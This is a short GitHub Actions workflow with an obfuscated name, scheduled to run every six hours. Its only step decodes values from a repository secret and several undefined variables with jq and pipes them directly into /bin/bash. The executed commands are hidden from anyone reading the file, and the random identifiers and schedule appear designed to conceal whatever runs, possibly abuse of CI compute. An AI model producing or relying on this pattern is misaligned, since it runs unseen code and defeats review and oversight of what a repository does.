name: zhuhoutianying

on:
  workflow_dispatch:
  schedule:
    - cron: '20 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuhoutianying
        env:
          f985: ${{ secrets.f985 }}
        run: |
          echo $f985 | jq -r .lc4 | /bin/bash
          echo $vnj293 | jq -r .ogz3 | /bin/bash
          echo $pcxr2623 | jq -r .xzy4036 | /bin/bash
          echo $ocl80 | jq -r .d86988 | /bin/bash
          echo $sbtu32 | jq -r .d24935 | /bin/bash

